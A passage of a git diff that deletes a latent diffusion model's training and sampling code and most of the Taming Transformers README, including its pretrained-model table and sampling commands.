- w = min(bbox[2] / crop_coordinates[2], 1 - x0)
- h = min(bbox[3] / crop_coordinates[3], 1 - y0)
- return x0, y0, w, h
-
- return [rescale_bbox(b) for b in bboxes]
-
- def apply_model(self, x_noisy, t, cond, return_ids=False):
-
- if isinstance(cond, dict):
- # hybrid case, cond is exptected to be a dict
- pass
- else:
- if not isinstance(cond, list):
- cond = [cond]
- key = 'c_concat' if self.model.conditioning_key == 'concat' else 'c_crossattn'
- cond = {key: cond}
-
- if hasattr(self, "split_input_params"):
- assert len(cond) == 1 # todo can only deal with one conditioning atm
- assert not return_ids
- ks = self.split_input_params["ks"] # eg. (128, 128)
- stride = self.split_input_params["stride"] # eg. (64, 64)
-
- h, w = x_noisy.shape[-2:]
-
- fold, unfold, normalization, weighting = self.get_fold_unfold(x_noisy, ks, stride)
-
- z = unfold(x_noisy) # (bn, nc * prod(**ks), L)
- # Reshape to img shape
- z = z.view((z.shape[0], -1, ks[0], ks[1], z.shape[-1])) # (bn, nc, ks[0], ks[1], L )
- z_list = [z[:, :, :, :, i] for i in range(z.shape[-1])]
-
- if self.cond_stage_key in ["image", "LR_image", "segmentation",
- 'bbox_img'] and self.model.conditioning_key: # todo check for completeness
- c_key = next(iter(cond.keys())) # get key
- c = next(iter(cond.values())) # get value
- assert (len(c) == 1) # todo extend to list with more than one elem
- c = c[0] # get element
-
- c = unfold(c)
- c = c.view((c.shape[0], -1, ks[0], ks[1], c.shape[-1])) # (bn, nc, ks[0], ks[1], L )
-
- cond_list = [{c_key: [c[:, :, :, :, i]]} for i in range(c.shape[-1])]
-
- elif self.cond_stage_key == 'coordinates_bbox':
- assert 'original_image_size' in self.split_input_params, 'BoudingBoxRescaling is missing original_image_size'
-
- # assuming padding of unfold is always 0 and its dilation is always 1
- n_patches_per_row = int((w - ks[0]) / stride[0] + 1)
- full_img_h, full_img_w = self.split_input_params['original_image_size']
- # as we are operating on latents, we need the factor from the original image size to the
- # spatial latent size to properly rescale the crops for regenerating the bbox annotations
- num_downs = self.first_stage_model.encoder.num_resolutions - 1
- rescale_latent = 2 ** (num_downs)
-
- # get top left postions of patches as conforming for the bbbox tokenizer, therefore we
- # need to rescale the tl patch coordinates to be in between (0,1)
- tl_patch_coordinates = [(rescale_latent * stride[0] * (patch_nr % n_patches_per_row) / full_img_w,
- rescale_latent * stride[1] * (patch_nr // n_patches_per_row) / full_img_h)
- for patch_nr in range(z.shape[-1])]
-
- # patch_limits are tl_coord, width and height coordinates as (x_tl, y_tl, h, w)
- patch_limits = [(x_tl, y_tl,
- rescale_latent * ks[0] / full_img_w,
- rescale_latent * ks[1] / full_img_h) for x_tl, y_tl in tl_patch_coordinates]
- # patch_values = [(np.arange(x_tl,min(x_tl+ks, 1.)),np.arange(y_tl,min(y_tl+ks, 1.))) for x_tl, y_tl in tl_patch_coordinates]
-
- # tokenize crop coordinates for the bounding boxes of the respective patches
- patch_limits_tknzd = [torch.LongTensor(self.bbox_tokenizer._crop_encoder(bbox))[None].to(self.device)
- for bbox in patch_limits] # list of length l with tensors of shape (1, 2)
- print(patch_limits_tknzd[0].shape)
- # cut tknzd crop position from conditioning
- assert isinstance(cond, dict), 'cond must be dict to be fed into model'
- cut_cond = cond['c_crossattn'][0][..., :-2].to(self.device)
- print(cut_cond.shape)
-
- adapted_cond = torch.stack([torch.cat([cut_cond, p], dim=1) for p in patch_limits_tknzd])
- adapted_cond = rearrange(adapted_cond, 'l b n -> (l b) n')
- print(adapted_cond.shape)
- adapted_cond = self.get_learned_conditioning(adapted_cond)
- print(adapted_cond.shape)
- adapted_cond = rearrange(adapted_cond, '(l b) n d -> l b n d', l=z.shape[-1])
- print(adapted_cond.shape)
-
- cond_list = [{'c_crossattn': [e]} for e in adapted_cond]
-
- else:
- cond_list = [cond for i in range(z.shape[-1])] # Todo make this more efficient
-
- # apply model by loop over crops
- output_list = [self.model(z_list[i], t, **cond_list[i]) for i in range(z.shape[-1])]
- assert not isinstance(output_list[0],
- tuple) # todo cant deal with multiple model outputs check this never happens
-
- o = torch.stack(output_list, axis=-1)
- o = o * weighting
- # Reverse reshape to img shape
- o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)
- # stitch crops together
- x_recon = fold(o) / normalization
-
- else:
- x_recon = self.model(x_noisy, t, **cond)
-
- if isinstance(x_recon, tuple) and not return_ids:
- return x_recon[0]
- else:
- return x_recon
-
- def _predict_eps_from_xstart(self, x_t, t, pred_xstart):
- return (extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t - pred_xstart) / \
- extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape)
-
- def _prior_bpd(self, x_start):
- """
- Get the prior KL term for the variational lower-bound, measured in
- bits-per-dim.
- This term can't be optimized, as it only depends on the encoder.
- :param x_start: the [N x C x ...] tensor of inputs.
- :return: a batch of [N] KL values (in bits), one per batch element.
- """
- batch_size = x_start.shape[0]
- t = torch.tensor([self.num_timesteps - 1] * batch_size, device=x_start.device)
- qt_mean, _, qt_log_variance = self.q_mean_variance(x_start, t)
- kl_prior = normal_kl(mean1=qt_mean, logvar1=qt_log_variance, mean2=0.0, logvar2=0.0)
- return mean_flat(kl_prior) / np.log(2.0)
-
- def p_losses(self, x_start, cond, t, noise=None):
- noise = default(noise, lambda: torch.randn_like(x_start))
- x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)
- model_output = self.apply_model(x_noisy, t, cond)
-
- loss_dict = {}
- prefix = 'train' if self.training else 'val'
-
- if self.parameterization == "x0":
- target = x_start
- elif self.parameterization == "eps":
- target = noise
- else:
- raise NotImplementedError()
-
- loss_simple = self.get_loss(model_output, target, mean=False).mean([1, 2, 3])
- loss_dict.update({f'{prefix}/loss_simple': loss_simple.mean()})
-
- logvar_t = self.logvar[t].to(self.device)
- loss = loss_simple / torch.exp(logvar_t) + logvar_t
- # loss = loss_simple / torch.exp(self.logvar) + self.logvar
- if self.learn_logvar:
- loss_dict.update({f'{prefix}/loss_gamma': loss.mean()})
- loss_dict.update({'logvar': self.logvar.data.mean()})
-
- loss = self.l_simple_weight * loss.mean()
-
- loss_vlb = self.get_loss(model_output, target, mean=False).mean(dim=(1, 2, 3))
- loss_vlb = (self.lvlb_weights[t] * loss_vlb).mean()
- loss_dict.update({f'{prefix}/loss_vlb': loss_vlb})
- loss += (self.original_elbo_weight * loss_vlb)
- loss_dict.update({f'{prefix}/loss': loss})
-
- return loss, loss_dict
-
- def p_mean_variance(self, x, c, t, clip_denoised: bool, return_codebook_ids=False, quantize_denoised=False,
- return_x0=False, score_corrector=None, corrector_kwargs=None):
- t_in = t
- model_out = self.apply_model(x, t_in, c, return_ids=return_codebook_ids)
-
- if score_corrector is not None:
- assert self.parameterization == "eps"
- model_out = score_corrector.modify_score(self, model_out, x, t, c, **corrector_kwargs)
-
- if return_codebook_ids:
- model_out, logits = model_out
-
- if self.parameterization == "eps":
- x_recon = self.predict_start_from_noise(x, t=t, noise=model_out)
- elif self.parameterization == "x0":
- x_recon = model_out
- else:
- raise NotImplementedError()
-
- if clip_denoised:
- x_recon.clamp_(-1., 1.)
- if quantize_denoised:
- x_recon, _, [_, _, indices] = self.first_stage_model.quantize(x_recon)
- model_mean, posterior_variance, posterior_log_variance = self.q_posterior(x_start=x_recon, x_t=x, t=t)
- if return_codebook_ids:
- return model_mean, posterior_variance, posterior_log_variance, logits
- elif return_x0:
- return model_mean, posterior_variance, posterior_log_variance, x_recon
- else:
- return model_mean, posterior_variance, posterior_log_variance
-
- @torch.no_grad()
- def p_sample(self, x, c, t, clip_denoised=False, repeat_noise=False,
- return_codebook_ids=False, quantize_denoised=False, return_x0=False,
- temperature=1., noise_dropout=0., score_corrector=None, corrector_kwargs=None):
- b, *_, device = *x.shape, x.device
- outputs = self.p_mean_variance(x=x, c=c, t=t, clip_denoised=clip_denoised,
- return_codebook_ids=return_codebook_ids,
- quantize_denoised=quantize_denoised,
- return_x0=return_x0,
- score_corrector=score_corrector, corrector_kwargs=corrector_kwargs)
- if return_codebook_ids:
- raise DeprecationWarning("Support dropped.")
- model_mean, _, model_log_variance, logits = outputs
- elif return_x0:
- model_mean, _, model_log_variance, x0 = outputs
- else:
- model_mean, _, model_log_variance = outputs
-
- noise = noise_like(x.shape, device, repeat_noise) * temperature
- if noise_dropout > 0.:
- noise = torch.nn.functional.dropout(noise, p=noise_dropout)
- # no noise when t == 0
- nonzero_mask = (1 - (t == 0).float()).reshape(b, *((1,) * (len(x.shape) - 1)))
-
- if return_codebook_ids:
- return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise, logits.argmax(dim=1)
- if return_x0:
- return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise, x0
- else:
- return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise
-
- @torch.no_grad()
- def progressive_denoising(self, cond, shape, verbose=True, callback=None, quantize_denoised=False,
- img_callback=None, mask=None, x0=None, temperature=1., noise_dropout=0.,
- score_corrector=None, corrector_kwargs=None, batch_size=None, x_T=None, start_T=None,
- log_every_t=None):
- if not log_every_t:
- log_every_t = self.log_every_t
- timesteps = self.num_timesteps
- if batch_size is not None:
- b = batch_size if batch_size is not None else shape[0]
- shape = [batch_size] + list(shape)
- else:
- b = batch_size = shape[0]
- if x_T is None:
- img = torch.randn(shape, device=self.device)
- else:
- img = x_T
- intermediates = []
- if cond is not None:
- if isinstance(cond, dict):
- cond = {key: cond[key][:batch_size] if not isinstance(cond[key], list) else
- list(map(lambda x: x[:batch_size], cond[key])) for key in cond}
- else:
- cond = [c[:batch_size] for c in cond] if isinstance(cond, list) else cond[:batch_size]
-
- if start_T is not None:
- timesteps = min(timesteps, start_T)
- iterator = tqdm(reversed(range(0, timesteps)), desc='Progressive Generation',
- total=timesteps) if verbose else reversed(
- range(0, timesteps))
- if type(temperature) == float:
- temperature = [temperature] * timesteps
-
- for i in iterator:
- ts = torch.full((b,), i, device=self.device, dtype=torch.long)
- if self.shorten_cond_schedule:
- assert self.model.conditioning_key != 'hybrid'
- tc = self.cond_ids[ts].to(cond.device)
- cond = self.q_sample(x_start=cond, t=tc, noise=torch.randn_like(cond))
-
- img, x0_partial = self.p_sample(img, cond, ts,
- clip_denoised=self.clip_denoised,
- quantize_denoised=quantize_denoised, return_x0=True,
- temperature=temperature[i], noise_dropout=noise_dropout,
- score_corrector=score_corrector, corrector_kwargs=corrector_kwargs)
- if mask is not None:
- assert x0 is not None
- img_orig = self.q_sample(x0, ts)
- img = img_orig * mask + (1. - mask) * img
-
- if i % log_every_t == 0 or i == timesteps - 1:
- intermediates.append(x0_partial)
- if callback: callback(i)
- if img_callback: img_callback(img, i)
- return img, intermediates
-
- @torch.no_grad()
- def p_sample_loop(self, cond, shape, return_intermediates=False,
- x_T=None, verbose=True, callback=None, timesteps=None, quantize_denoised=False,
- mask=None, x0=None, img_callback=None, start_T=None,
- log_every_t=None):
-
- if not log_every_t:
- log_every_t = self.log_every_t
- device = self.betas.device
- b = shape[0]
- if x_T is None:
- img = torch.randn(shape, device=device)
- else:
- img = x_T
-
- intermediates = [img]
- if timesteps is None:
- timesteps = self.num_timesteps
-
- if start_T is not None:
- timesteps = min(timesteps, start_T)
- iterator = tqdm(reversed(range(0, timesteps)), desc='Sampling t', total=timesteps) if verbose else reversed(
- range(0, timesteps))
-
- if mask is not None:
- assert x0 is not None
- assert x0.shape[2:3] == mask.shape[2:3] # spatial size has to match
-
- for i in iterator:
- ts = torch.full((b,), i, device=device, dtype=torch.long)
- if self.shorten_cond_schedule:
- assert self.model.conditioning_key != 'hybrid'
- tc = self.cond_ids[ts].to(cond.device)
- cond = self.q_sample(x_start=cond, t=tc, noise=torch.randn_like(cond))
-
- img = self.p_sample(img, cond, ts,
- clip_denoised=self.clip_denoised,
- quantize_denoised=quantize_denoised)
- if mask is not None:
- img_orig = self.q_sample(x0, ts)
- img = img_orig * mask + (1. - mask) * img
-
- if i % log_every_t == 0 or i == timesteps - 1:
- intermediates.append(img)
- if callback: callback(i)
- if img_callback: img_callback(img, i)
-
- if return_intermediates:
- return img, intermediates
- return img
-
- @torch.no_grad()
- def sample(self, cond, batch_size=16, return_intermediates=False, x_T=None,
- verbose=True, timesteps=None, quantize_denoised=False,
- mask=None, x0=None, shape=None,**kwargs):
- if shape is None:
- shape = (batch_size, self.channels, self.image_size, self.image_size)
- if cond is not None:
- if isinstance(cond, dict):
- cond = {key: cond[key][:batch_size] if not isinstance(cond[key], list) else
- list(map(lambda x: x[:batch_size], cond[key])) for key in cond}
- else:
- cond = [c[:batch_size] for c in cond] if isinstance(cond, list) else cond[:batch_size]
- return self.p_sample_loop(cond,
- shape,
- return_intermediates=return_intermediates, x_T=x_T,
- verbose=verbose, timesteps=timesteps, quantize_denoised=quantize_denoised,
- mask=mask, x0=x0)
-
- @torch.no_grad()
- def sample_log(self,cond,batch_size,ddim, ddim_steps,**kwargs):
-
- if ddim:
- ddim_sampler = DDIMSampler(self)
- shape = (self.channels, self.image_size, self.image_size)
- samples, intermediates =ddim_sampler.sample(ddim_steps,batch_size,
- shape,cond,verbose=False,**kwargs)
-
- else:
- samples, intermediates = self.sample(cond=cond, batch_size=batch_size,
- return_intermediates=True,**kwargs)
-
- return samples, intermediates
-
-
- @torch.no_grad()
- def log_images(self, batch, N=8, n_row=4, sample=True, ddim_steps=200, ddim_eta=1., return_keys=None,
- quantize_denoised=True, inpaint=True, plot_denoise_rows=False, plot_progressive_rows=True,
- plot_diffusion_rows=True, **kwargs):
-
- use_ddim = ddim_steps is not None
-
- log = dict()
- z, c, x, xrec, xc = self.get_input(batch, self.first_stage_key,
- return_first_stage_outputs=True,
- force_c_encode=True,
- return_original_cond=True,
- bs=N)
- N = min(x.shape[0], N)
- n_row = min(x.shape[0], n_row)
- log["inputs"] = x
- log["reconstruction"] = xrec
- if self.model.conditioning_key is not None:
- if hasattr(self.cond_stage_model, "decode"):
- xc = self.cond_stage_model.decode(c)
- log["conditioning"] = xc
- elif self.cond_stage_key in ["caption"]:
- xc = log_txt_as_img((x.shape[2], x.shape[3]), batch["caption"])
- log["conditioning"] = xc
- elif self.cond_stage_key == 'class_label':
- xc = log_txt_as_img((x.shape[2], x.shape[3]), batch["human_label"])
- log['conditioning'] = xc
- elif isimage(xc):
- log["conditioning"] = xc
- if ismap(xc):
- log["original_conditioning"] = self.to_rgb(xc)
-
- if plot_diffusion_rows:
- # get diffusion row
- diffusion_row = list()
- z_start = z[:n_row]
- for t in range(self.num_timesteps):
- if t % self.log_every_t == 0 or t == self.num_timesteps - 1:
- t = repeat(torch.tensor([t]), '1 -> b', b=n_row)
- t = t.to(self.device).long()
- noise = torch.randn_like(z_start)
- z_noisy = self.q_sample(x_start=z_start, t=t, noise=noise)
- diffusion_row.append(self.decode_first_stage(z_noisy))
-
- diffusion_row = torch.stack(diffusion_row) # n_log_step, n_row, C, H, W
- diffusion_grid = rearrange(diffusion_row, 'n b c h w -> b n c h w')
- diffusion_grid = rearrange(diffusion_grid, 'b n c h w -> (b n) c h w')
- diffusion_grid = make_grid(diffusion_grid, nrow=diffusion_row.shape[0])
- log["diffusion_row"] = diffusion_grid
-
- if sample:
- # get denoise row
- with self.ema_scope("Plotting"):
- samples, z_denoise_row = self.sample_log(cond=c,batch_size=N,ddim=use_ddim,
- ddim_steps=ddim_steps,eta=ddim_eta)
- # samples, z_denoise_row = self.sample(cond=c, batch_size=N, return_intermediates=True)
- x_samples = self.decode_first_stage(samples)
- log["samples"] = x_samples
- if plot_denoise_rows:
- denoise_grid = self._get_denoise_row_from_list(z_denoise_row)
- log["denoise_row"] = denoise_grid
-
- if quantize_denoised and not isinstance(self.first_stage_model, AutoencoderKL) and not isinstance(
- self.first_stage_model, IdentityFirstStage):
- # also display when quantizing x0 while sampling
- with self.ema_scope("Plotting Quantized Denoised"):
- samples, z_denoise_row = self.sample_log(cond=c,batch_size=N,ddim=use_ddim,
- ddim_steps=ddim_steps,eta=ddim_eta,
- quantize_denoised=True)
- # samples, z_denoise_row = self.sample(cond=c, batch_size=N, return_intermediates=True,
- # quantize_denoised=True)
- x_samples = self.decode_first_stage(samples.to(self.device))
- log["samples_x0_quantized"] = x_samples
-
- if inpaint:
- # make a simple center square
- b, h, w = z.shape[0], z.shape[2], z.shape[3]
- mask = torch.ones(N, h, w).to(self.device)
- # zeros will be filled in
- mask[:, h // 4:3 * h // 4, w // 4:3 * w // 4] = 0.
- mask = mask[:, None, ...]
- with self.ema_scope("Plotting Inpaint"):
-
- samples, _ = self.sample_log(cond=c,batch_size=N,ddim=use_ddim, eta=ddim_eta,
- ddim_steps=ddim_steps, x0=z[:N], mask=mask)
- x_samples = self.decode_first_stage(samples.to(self.device))
- log["samples_inpainting"] = x_samples
- log["mask"] = mask
-
- # outpaint
- with self.ema_scope("Plotting Outpaint"):
- samples, _ = self.sample_log(cond=c, batch_size=N, ddim=use_ddim,eta=ddim_eta,
- ddim_steps=ddim_steps, x0=z[:N], mask=mask)
- x_samples = self.decode_first_stage(samples.to(self.device))
- log["samples_outpainting"] = x_samples
-
- if plot_progressive_rows:
- with self.ema_scope("Plotting Progressives"):
- img, progressives = self.progressive_denoising(c,
- shape=(self.channels, self.image_size, self.image_size),
- batch_size=N)
- prog_row = self._get_denoise_row_from_list(progressives, desc="Progressive Generation")
- log["progressive_row"] = prog_row
-
- if return_keys:
- if np.intersect1d(list(log.keys()), return_keys).shape[0] == 0:
- return log
- else:
- return {key: log[key] for key in return_keys}
- return log
-
- def configure_optimizers(self):
- lr = self.learning_rate
- params = list(self.model.parameters())
- if self.cond_stage_trainable:
- print(f"{self.__class__.__name__}: Also optimizing conditioner params!")
- params = params + list(self.cond_stage_model.parameters())
- if self.learn_logvar:
- print('Diffusion model optimizing logvar')
- params.append(self.logvar)
- opt = torch.optim.AdamW(params, lr=lr)
- if self.use_scheduler:
- assert 'target' in self.scheduler_config
- scheduler = instantiate_from_config(self.scheduler_config)
-
- print("Setting up LambdaLR scheduler...")
- scheduler = [
- {
- 'scheduler': LambdaLR(opt, lr_lambda=scheduler.schedule),
- 'interval': 'step',
- 'frequency': 1
- }]
- return [opt], scheduler
- return opt
-
- @torch.no_grad()
- def to_rgb(self, x):
- x = x.float()
- if not hasattr(self, "colorize"):
- self.colorize = torch.randn(3, x.shape[1], 1, 1).to(x)
- x = nn.functional.conv2d(x, weight=self.colorize)
- x = 2. * (x - x.min()) / (x.max() - x.min()) - 1.
- return x
-
-
-class DiffusionWrapper(pl.LightningModule):
- def __init__(self, diff_model_config, conditioning_key):
- super().__init__()
- self.diffusion_model = instantiate_from_config(diff_model_config)
- self.conditioning_key = conditioning_key
- # self.conditioning_key = None
- assert self.conditioning_key in [None, 'concat', 'crossattn', 'hybrid', 'adm']
-
- def forward(self, x, t, c_concat: list = None, c_crossattn: list = None):
- if self.conditioning_key is None:
- out = self.diffusion_model(x, t)
- elif self.conditioning_key == 'concat':
- xc = torch.cat([x] + c_concat, dim=1)
- out = self.diffusion_model(xc, t)
- elif self.conditioning_key == 'crossattn':
- cc = torch.cat(c_crossattn, 1)
- out = self.diffusion_model(x, t, context=cc)
- elif self.conditioning_key == 'hybrid':
- xc = torch.cat([x] + c_concat, dim=1)
- cc = torch.cat(c_crossattn, 1)
- out = self.diffusion_model(xc, t, context=cc)
- elif self.conditioning_key == 'adm':
- cc = c_crossattn[0]
- out = self.diffusion_model(x, t, y=cc)
- else:
- raise NotImplementedError()
-
- return out
-
-
-class Layout2ImgDiffusion(LatentDiffusion):
- # TODO: move all layout-specific hacks to this class
- def __init__(self, cond_stage_key, *args, **kwargs):
- assert cond_stage_key == 'coordinates_bbox', 'Layout2ImgDiffusion only for cond_stage_key="coordinates_bbox"'
- super().__init__(cond_stage_key=cond_stage_key, *args, **kwargs)
-
- def log_images(self, batch, N=8, *args, **kwargs):
- logs = super().log_images(batch=batch, N=N, *args, **kwargs)
-
- key = 'train' if self.training else 'validation'
- dset = self.trainer.datamodule.datasets[key]
- mapper = dset.conditional_builders[self.cond_stage_key]
-
- bbox_imgs = []
- map_fn = lambda catno: dset.get_textual_label(dset.get_category_id(catno))
- for tknzd_bbox in batch[self.cond_stage_key][:N]:
- bboximg = mapper.plot(tknzd_bbox.detach().cpu(), map_fn, (256, 256))
- bbox_imgs.append(bboximg)
-
- cond_img = torch.stack(bbox_imgs, dim=0)
- logs['bbox_image'] = cond_img
- return logs
diff --git a/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/README.md b/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/README.md
deleted file mode 100644
index d295fbf75703e6cd285330432785b8cdea072ba7..0000000000000000000000000000000000000000
--- a/spaces/Purple11/Grounded-Diffusion/src/taming-transformers/README.md
+++ /dev/null
@@ -1,410 +0,0 @@
-# Taming Transformers for High-Resolution Image Synthesis
-##### CVPR 2021 (Oral)
-
-
-[**Taming Transformers for High-Resolution Image Synthesis**](https://compvis.github.io/taming-transformers/)
-[Patrick Esser](https://github.com/pesser)\*,
-[Robin Rombach](https://github.com/rromb)\*,
-[Björn Ommer](https://hci.iwr.uni-heidelberg.de/Staff/bommer)
-\* equal contribution
-
-**tl;dr** We combine the efficiancy of convolutional approaches with the expressivity of transformers by introducing a convolutional VQGAN, which learns a codebook of context-rich visual parts, whose composition is modeled with an autoregressive transformer.
-
-
-[arXiv](https://arxiv.org/abs/2012.09841) | [BibTeX](#bibtex) | [Project Page](https://compvis.github.io/taming-transformers/)
-
-
-### News
-#### 2022
-- More pretrained VQGANs (e.g. a f8-model with only 256 codebook entries) are available in our new work on [Latent Diffusion Models](https://github.com/CompVis/latent-diffusion).
-- Added scene synthesis models as proposed in the paper [High-Resolution Complex Scene Synthesis with Transformers](https://arxiv.org/abs/2105.06458), see [this section](#scene-image-synthesis).
-#### 2021
-- Thanks to [rom1504](https://github.com/rom1504) it is now easy to [train a VQGAN on your own datasets](#training-on-custom-data).
-- Included a bugfix for the quantizer. For backward compatibility it is
- disabled by default (which corresponds to always training with `beta=1.0`).
- Use `legacy=False` in the quantizer config to enable it.
- Thanks [richcmwang](https://github.com/richcmwang) and [wcshin-git](https://github.com/wcshin-git)!
-- Our paper received an update: See https://arxiv.org/abs/2012.09841v3 and the corresponding changelog.
-- Added a pretrained, [1.4B transformer model](https://k00.fr/s511rwcv) trained for class-conditional ImageNet synthesis, which obtains state-of-the-art FID scores among autoregressive approaches and outperforms BigGAN.
-- Added pretrained, unconditional models on [FFHQ](https://k00.fr/yndvfu95) and [CelebA-HQ](https://k00.fr/2xkmielf).
-- Added accelerated sampling via caching of keys/values in the self-attention operation, used in `scripts/sample_fast.py`.
-- Added a checkpoint of a [VQGAN](https://heibox.uni-heidelberg.de/d/2e5662443a6b4307b470/) trained with f8 compression and Gumbel-Quantization.
- See also our updated [reconstruction notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/reconstruction_usage.ipynb).
-- We added a [colab notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/reconstruction_usage.ipynb) which compares two VQGANs and OpenAI's [DALL-E](https://github.com/openai/DALL-E). See also [this section](#more-resources).
-- We now include an overview of pretrained models in [Tab.1](#overview-of-pretrained-models). We added models for [COCO](#coco) and [ADE20k](#ade20k).
-- The streamlit demo now supports image completions.
-- We now include a couple of examples from the D-RIN dataset so you can run the
- [D-RIN demo](#d-rin) without preparing the dataset first.
-- You can now jump right into sampling with our [Colab quickstart notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/taming-transformers.ipynb).
-
-## Requirements
-A suitable [conda](https://conda.io/) environment named `taming` can be created
-and activated with:
-
-```
-conda env create -f environment.yaml
-conda activate taming
-```
-## Overview of pretrained models
-The following table provides an overview of all models that are currently available.
-FID scores were evaluated using [torch-fidelity](https://github.com/toshas/torch-fidelity).
-For reference, we also include a link to the recently released autoencoder of the [DALL-E](https://github.com/openai/DALL-E) model.
-See the corresponding [colab
-notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/reconstruction_usage.ipynb)
-for a comparison and discussion of reconstruction capabilities.
-
-| Dataset | FID vs train | FID vs val | Link | Samples (256x256) | Comments
-| ------------- | ------------- | ------------- |------------- | ------------- |------------- |
-| FFHQ (f=16) | 9.6 | -- | [ffhq_transformer](https://k00.fr/yndvfu95) | [ffhq_samples](https://k00.fr/j626x093) |
-| CelebA-HQ (f=16) | 10.2 | -- | [celebahq_transformer](https://k00.fr/2xkmielf) | [celebahq_samples](https://k00.fr/j626x093) |
-| ADE20K (f=16) | -- | 35.5 | [ade20k_transformer](https://k00.fr/ot46cksa) | [ade20k_samples.zip](https://heibox.uni-heidelberg.de/f/70bb78cbaf844501b8fb/) [2k] | evaluated on val split (2k images)
-| COCO-Stuff (f=16) | -- | 20.4 | [coco_transformer](https://k00.fr/2zz6i2ce) | [coco_samples.zip](https://heibox.uni-heidelberg.de/f/a395a9be612f4a7a8054/) [5k] | evaluated on val split (5k images)
-| ImageNet (cIN) (f=16) | 15.98/15.78/6.59/5.88/5.20 | -- | [cin_transformer](https://k00.fr/s511rwcv) | [cin_samples](https://k00.fr/j626x093) | different decoding hyperparameters |
-| | | | || |
-| FacesHQ (f=16) | -- | -- | [faceshq_transformer](https://k00.fr/qqfl2do8)
-| S-FLCKR (f=16) | -- | -- | [sflckr](https://heibox.uni-heidelberg.de/d/73487ab6e5314cb5adba/)
-| D-RIN (f=16) | -- | -- | [drin_transformer](https://k00.fr/39jcugc5)
-| | | | | || |
-| VQGAN ImageNet (f=16), 1024 | 10.54 | 7.94 | [vqgan_imagenet_f16_1024](https://heibox.uni-heidelberg.de/d/8088892a516d4e3baf92/) | [reconstructions](https://k00.fr/j626x093) | Reconstruction-FIDs.
-| VQGAN ImageNet (f=16), 16384 | 7.41 | 4.98 |[vqgan_imagenet_f16_16384](https://heibox.uni-heidelberg.de/d/a7530b09fed84f80a887/) | [reconstructions](https://k00.fr/j626x093) | Reconstruction-FIDs.
-| VQGAN OpenImages (f=8), 256 | -- | 1.49 |https://ommer-lab.com/files/latent-diffusion/vq-f8-n256.zip | --- | Reconstruction-FIDs. Available via [latent diffusion](https://github.com/CompVis/latent-diffusion).
-| VQGAN OpenImages (f=8), 16384 | -- | 1.14 |https://ommer-lab.com/files/latent-diffusion/vq-f8.zip | --- | Reconstruction-FIDs. Available via [latent diffusion](https://github.com/CompVis/latent-diffusion)
-| VQGAN OpenImages (f=8), 8192, GumbelQuantization | 3.24 | 1.49 |[vqgan_gumbel_f8](https://heibox.uni-heidelberg.de/d/2e5662443a6b4307b470/) | --- | Reconstruction-FIDs.
-| | | | | || |
-| DALL-E dVAE (f=8), 8192, GumbelQuantization | 33.88 | 32.01 | https://github.com/openai/DALL-E | [reconstructions](https://k00.fr/j626x093) | Reconstruction-FIDs.
-
-
-## Running pretrained models
-
-The commands below will start a streamlit demo which supports sampling at
-different resolutions and image completions. To run a non-interactive version
-of the sampling process, replace `streamlit run scripts/sample_conditional.py --`
-by `python scripts/make_samples.py --outdir ` and
-keep the remaining command line arguments.
-
-To sample from unconditional or class-conditional models,
-run `python scripts/sample_fast.py -r `.
-We describe below how to use this script to sample from the ImageNet, FFHQ, and CelebA-HQ models,
-respectively.
-
-### S-FLCKR
-
-
-You can also [run this model in a Colab
-notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/taming-transformers.ipynb),
-which includes all necessary steps to start sampling.
-
-Download the
-[2020-11-09T13-31-51_sflckr](https://heibox.uni-heidelberg.de/d/73487ab6e5314cb5adba/)
-folder and place it into `logs`. Then, run
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-09T13-31-51_sflckr/
-```
-
-### ImageNet
-
-
-Download the [2021-04-03T19-39-50_cin_transformer](https://k00.fr/s511rwcv)
-folder and place it into logs. Sampling from the class-conditional ImageNet
-model does not require any data preparation. To produce 50 samples for each of
-the 1000 classes of ImageNet, with k=600 for top-k sampling, p=0.92 for nucleus
-sampling and temperature t=1.0, run
-
-```
-python scripts/sample_fast.py -r logs/2021-04-03T19-39-50_cin_transformer/ -n 50 -k 600 -t 1.0 -p 0.92 --batch_size 25
-```
-
-To restrict the model to certain classes, provide them via the `--classes` argument, separated by
-commas. For example, to sample 50 *ostriches*, *border collies* and *whiskey jugs*, run
-
-```
-python scripts/sample_fast.py -r logs/2021-04-03T19-39-50_cin_transformer/ -n 50 -k 600 -t 1.0 -p 0.92 --batch_size 25 --classes 9,232,901
-```
-We recommended to experiment with the autoregressive decoding parameters (top-k, top-p and temperature) for best results.
-
-### FFHQ/CelebA-HQ
-
-Download the [2021-04-23T18-19-01_ffhq_transformer](https://k00.fr/yndvfu95) and
-[2021-04-23T18-11-19_celebahq_transformer](https://k00.fr/2xkmielf)
-folders and place them into logs.
-Again, sampling from these unconditional models does not require any data preparation.
-To produce 50000 samples, with k=250 for top-k sampling,
-p=1.0 for nucleus sampling and temperature t=1.0, run
-
-```
-python scripts/sample_fast.py -r logs/2021-04-23T18-19-01_ffhq_transformer/
-```
-for FFHQ and
-
-```
-python scripts/sample_fast.py -r logs/2021-04-23T18-11-19_celebahq_transformer/
-```
-to sample from the CelebA-HQ model.
-For both models it can be advantageous to vary the top-k/top-p parameters for sampling.
-
-### FacesHQ
-
-
-Download [2020-11-13T21-41-45_faceshq_transformer](https://k00.fr/qqfl2do8) and
-place it into `logs`. Follow the data preparation steps for
-[CelebA-HQ](#celeba-hq) and [FFHQ](#ffhq). Run
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-13T21-41-45_faceshq_transformer/
-```
-
-### D-RIN
-
-
-Download [2020-11-20T12-54-32_drin_transformer](https://k00.fr/39jcugc5) and
-place it into `logs`. To run the demo on a couple of example depth maps
